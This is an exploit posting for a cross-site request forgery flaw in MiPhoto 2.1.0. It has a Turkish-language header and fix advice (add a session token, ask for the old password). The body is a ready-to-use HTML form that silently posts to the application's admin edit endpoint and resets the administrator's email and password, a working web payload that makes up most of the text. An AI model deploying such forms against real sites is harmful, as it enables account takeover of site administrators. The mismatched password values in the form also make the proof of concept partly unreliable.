< ------------------- header data start ------------------- >

#############################################################

# Application Name : MiPhoto 2.1.0
# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<form method=’post’ action=’http://localhost/path/admin/content.php?do=admins&act=edit&id=1’>
<input type=’hidden’ name=’email’ value=[email protected]>
<input type=’hidden’ name=’password’ value=system>
<input type=’hidden’ name=’verifypassword’ value=hacker>
<input type=’submit’ value=’Edit’>
</form>


< -- bug code end of -- >